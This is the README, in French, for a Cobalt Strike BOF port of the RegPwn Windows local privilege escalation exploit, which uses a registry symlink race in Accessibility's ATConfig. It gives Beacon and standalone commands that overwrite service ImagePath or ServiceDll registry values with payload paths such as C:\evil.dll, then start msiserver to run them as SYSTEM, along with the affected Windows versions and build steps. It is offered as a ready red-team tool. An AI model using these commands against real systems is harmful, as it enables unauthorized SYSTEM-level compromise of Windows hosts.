
Bof de RegPwn par MDSec
Portage BOF Cobalt Strike de l'exploit RegPwn par Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.
Il s'agit d'une réimplémentation BOF bâclée de l'exploit C# original. Tout le crédit de la recherche de vulnérabilité et de l'exploit revient à Filip Dragovic et MDSec.
Exploite une condition de course de lien symbolique de registre dans le mécanisme ATConfig d'Accessibilité Windows pour écrire des valeurs arbitraires dans des clés de registre HKLM protégées depuis un contexte utilisateur normal (élévation de privilèges locale).
Cible Windows 11 25H2/24H2, Windows 10 21H2 et Windows Server 2016/2019/2022 avant le correctif de mars 2026.
ATTENTION : Cet exploit verrouille le poste de travail dans le cadre de la condition de course.
Le service msiserver (Windows Installer) ImagePath. Ce service s'exécute en tant que SYSTEM et peut être démarré par des utilisateurs normaux.
Chargez regpwn.cna dans le Gestionnaire de scripts, puis :
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
Une fois l'exploit réussi, démarrez le service pour exécuter en tant que SYSTEM :
net start msiserver
Nécessite x86_64-w64-mingw32-gcc (compilateur croisé MinGW-w64).
make # build BOF (regpwn.x64.o)
make test # build standalone EXE (regpwn.x64.exe)
make clean
x64 uniquement.